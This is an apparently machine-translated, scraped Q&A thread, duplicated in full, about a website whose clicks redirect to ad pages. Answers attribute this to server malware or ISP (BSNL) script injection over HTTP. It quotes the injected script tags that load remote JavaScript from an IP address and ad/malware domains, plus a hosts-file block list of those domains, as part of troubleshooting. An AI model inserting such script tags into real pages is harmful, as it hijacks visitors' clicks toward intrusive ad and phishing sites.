未知脚本 运行 并在点击时重定向到未知网站
unknown scripts are running and redirecting on click to unknown websties
问题:- 有时,点击 NAVBAR 菜单或我 bootstrap 网站上的任何 div,它会重定向到广告或未知 links 在新标签中是这样的。
http://cobalten.com/afu.php?zoneid=1365143&var=1492756
从托管文件导入 links:-
<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">
<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" type="text/css" href="css\style.css">
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
crossorigin="anonymous">
<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>
我在检查中得到的:-
当点击菜单上没有重定向时,我多次检查了我的代码。我没有发现任何可疑的东西......
但是当我点击重定向 links 时,我在浏览器中检查了我的代码,我可以清楚地看到很少有脚本源添加到我的文件中(只能在浏览器的检查模式下看到)。它们没有写到我的代码。我的代码的未知部分是..
1) HERE 以下 2 个脚本正在替换 head 标签中的脚本 js/jquery.min.js
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530041241377&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" type="text/javascript"></script>
2) 在我导入 google api
之后,这个被添加到 body 标签
<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>
3) 这个也在body标签里。
<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>
4) 检查重定向 link。 HEADERS 信息:-
Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644
我试过的:-
我的代码很干净,没有将它重定向到某个地方的脚本。可能是我的浏览器或 Windows 被入侵了。我检查了 3 个浏览器 EDGE、CHROME、FIREFOX 的网站.. 遇到了同样的问题。然后我从 Win7 升级到 Windows 10 并进行了全新安装。但什么也没发生。然后我想问问 Hostgator 支持,如果服务器受到威胁,他们从他们那端回答说没问题......
我安装了 malwarebytes 和所有软件来解决它......但他们只是通知 chrome / firefox / Edge 正在重定向到带有一些域名的出站 ID,主要是 go.oclasrv.com 并且什么都不做。
**
任何解决方案???
**
更新:-
我在 Hostgator 支持反馈中得到了类似的重定向 link..
注意到,这里字符串中的域名被替换为rateus.in
zoneid=1492761 与我打开的任何不安全 link 相同..
cb=xxxxxxxxxxxx 和 tm=xxxxxxxxxxx 也针对不同的 link 进行了更改,而 fingerprint=c2VwLW5vLXJlZGlyZWN0 对于我打开的所有 link 都是相同的。
<script async="" src="//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530191489196&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>
<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag"></script>
<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>
我的OS已经完全升级到WIN10专业版了,我只安装了Chrome,没有任何插件...
问题与浏览器无关,因为我在 EDGE 和 Firefox 上得到了相同的结果。
任何可以在这里帮助我的 JS 专家
您遇到的这个问题是服务器端的。您的代码可能没有任何问题,但是服务器感染了恶意软件,将此错误代码注入您的网站。
为了解决这个问题,我会备份您编写的代码,更改您的 FTP 主机密码,清除您的服务器,然后重新添加您的代码。如果这不能解决问题,那么我会更换托管服务提供商。
这似乎是 ISP 注入 JavaScript 文件的情况。您是否有机会使用 BSNL 宽带?最近几天,BSNL 似乎在 HTTP(非加密)网站上注入广告软件。
我知道的唯一解决方案是在 https 上托管您的网站或更改您的 ISP。
如果看到从以下IP注入的未知脚本,那么就是BSNL ISP注入的脚本文件。
61.0.245.90, 117.205.13.171
这些脚本仅在您访问 HTTP 网站时被注入。 HTTPS 涉及传输层安全,因此它不能被 ISP 篡改。
来自这个IP的脚本文件只是一个管道,它从不同的AD媒体下载更多的AD脚本。大多数广告媒体通过劫持用户鼠标点击打开弹出窗口来跟踪侵入性广告。
BSNL 对这种 activity 的借口是,它是一种增强订阅者浏览体验的功能。 BSNL injecting such scripts 上有详细的 post 以及如何停止这些内容。
抓得好!
由于安全性差,BSNL 服务器每天都在损坏或感染恶意软件/病毒
有 naganoadigei.com 被明确注册为提供恶意软件并将用户重定向到网络钓鱼站点。
最近在 2019 年 2 月,他们解决了这个问题。但不幸的是,新型
基于广告的重定向发现截至 2019 年 2 月 humparsi.com
您可以访问Sucuri
查看站点是否被感染
或者,您可以在 DNS 条目中阻止您的独立系统发出的请求
导航至 %windir%\System32\drivers\etc 并以提升模式/使用管理员权限编辑 hosts 文件并将这些行添加到您的 hosts 文件
0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com
以上站点未使用 SSL 进行保护
要阻止特定的 IP 地址,您可以通过阻止防火墙中的传出边界来实现
为了减少影响或任何不太可能的不利影响,您可以通过安装 NoScript 或 ScriptSafe 和 [=16= 等附加组件来阻止 JavaScript ]
要找出哪个应用程序使用 IP 地址和分配的端口号:
C:\Windows\system32>netstat -anob
只需从路由器的安全部分阻止 URL(注入这些广告的 bsnl IP)。对我来说 bsnl URL 是 http://117.254.84.212
Adguard has fixed this as referenced here 来阻止点击劫持。
该脚本可以在移动浏览器中运行,打开新标签广告。
将您的 Adguard Filters 更新到最新版本以查看
阻止这个 URL http://117.254.84.212:3000 似乎更有效
In Router
问题:- 有时,点击 NAVBAR 菜单或我 bootstrap 网站上的任何 div,它会重定向到广告或未知 links 在新标签中是这样的。
http://cobalten.com/afu.php?zoneid=1365143&var=1492756
从托管文件导入 links:-
<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">
<script src="js/jquery.min.js"></script>
<script src="js/main.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<link rel="stylesheet" type="text/css" href="css\style.css">
<link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">
<link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
crossorigin="anonymous">
<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>
我在检查中得到的:-
当点击菜单上没有重定向时,我多次检查了我的代码。我没有发现任何可疑的东西...... 但是当我点击重定向 links 时,我在浏览器中检查了我的代码,我可以清楚地看到很少有脚本源添加到我的文件中(只能在浏览器的检查模式下看到)。它们没有写到我的代码。我的代码的未知部分是..
1) HERE 以下 2 个脚本正在替换 head 标签中的脚本 js/jquery.min.js
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530041241377&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>
<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" type="text/javascript"></script>
2) 在我导入 google api
之后,这个被添加到 body 标签<span id="notiMain">
<script src="//go.oclasrv.com/apu.php?zoneid=1492761" type="text/javascript">< /script>
</span>
3) 这个也在body标签里。
<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>
4) 检查重定向 link。 HEADERS 信息:-
Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644
我试过的:-
我的代码很干净,没有将它重定向到某个地方的脚本。可能是我的浏览器或 Windows 被入侵了。我检查了 3 个浏览器 EDGE、CHROME、FIREFOX 的网站.. 遇到了同样的问题。然后我从 Win7 升级到 Windows 10 并进行了全新安装。但什么也没发生。然后我想问问 Hostgator 支持,如果服务器受到威胁,他们从他们那端回答说没问题...... 我安装了 malwarebytes 和所有软件来解决它......但他们只是通知 chrome / firefox / Edge 正在重定向到带有一些域名的出站 ID,主要是 go.oclasrv.com 并且什么都不做。
**
任何解决方案???
**
更新:-
我在 Hostgator 支持反馈中得到了类似的重定向 link..
注意到,这里字符串中的域名被替换为rateus.in zoneid=1492761 与我打开的任何不安全 link 相同.. cb=xxxxxxxxxxxx 和 tm=xxxxxxxxxxx 也针对不同的 link 进行了更改,而 fingerprint=c2VwLW5vLXJlZGlyZWN0 对于我打开的所有 link 都是相同的。
<script async="" src="//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&screenheight=768&screenwidth=1360&tm=1530191489196&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>
<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag"></script>
<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>
我的OS已经完全升级到WIN10专业版了,我只安装了Chrome,没有任何插件...
问题与浏览器无关,因为我在 EDGE 和 Firefox 上得到了相同的结果。
任何可以在这里帮助我的 JS 专家
您遇到的这个问题是服务器端的。您的代码可能没有任何问题,但是服务器感染了恶意软件,将此错误代码注入您的网站。
为了解决这个问题,我会备份您编写的代码,更改您的 FTP 主机密码,清除您的服务器,然后重新添加您的代码。如果这不能解决问题,那么我会更换托管服务提供商。
这似乎是 ISP 注入 JavaScript 文件的情况。您是否有机会使用 BSNL 宽带?最近几天,BSNL 似乎在 HTTP(非加密)网站上注入广告软件。
我知道的唯一解决方案是在 https 上托管您的网站或更改您的 ISP。
如果看到从以下IP注入的未知脚本,那么就是BSNL ISP注入的脚本文件。
61.0.245.90, 117.205.13.171
这些脚本仅在您访问 HTTP 网站时被注入。 HTTPS 涉及传输层安全,因此它不能被 ISP 篡改。
来自这个IP的脚本文件只是一个管道,它从不同的AD媒体下载更多的AD脚本。大多数广告媒体通过劫持用户鼠标点击打开弹出窗口来跟踪侵入性广告。
BSNL 对这种 activity 的借口是,它是一种增强订阅者浏览体验的功能。 BSNL injecting such scripts 上有详细的 post 以及如何停止这些内容。
抓得好!
由于安全性差,BSNL 服务器每天都在损坏或感染恶意软件/病毒
有 naganoadigei.com 被明确注册为提供恶意软件并将用户重定向到网络钓鱼站点。
最近在 2019 年 2 月,他们解决了这个问题。但不幸的是,新型 基于广告的重定向发现截至 2019 年 2 月 humparsi.com
您可以访问Sucuri
查看站点是否被感染或者,您可以在 DNS 条目中阻止您的独立系统发出的请求
导航至 %windir%\System32\drivers\etc 并以提升模式/使用管理员权限编辑 hosts 文件并将这些行添加到您的 hosts 文件
0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com
以上站点未使用 SSL 进行保护
要阻止特定的 IP 地址,您可以通过阻止防火墙中的传出边界来实现
为了减少影响或任何不太可能的不利影响,您可以通过安装 NoScript 或 ScriptSafe 和 [=16= 等附加组件来阻止 JavaScript ]
要找出哪个应用程序使用 IP 地址和分配的端口号:
C:\Windows\system32>netstat -anob
只需从路由器的安全部分阻止 URL(注入这些广告的 bsnl IP)。对我来说 bsnl URL 是 http://117.254.84.212
Adguard has fixed this as referenced here 来阻止点击劫持。 该脚本可以在移动浏览器中运行,打开新标签广告。
将您的 Adguard Filters 更新到最新版本以查看
阻止这个 URL http://117.254.84.212:3000 似乎更有效
In Router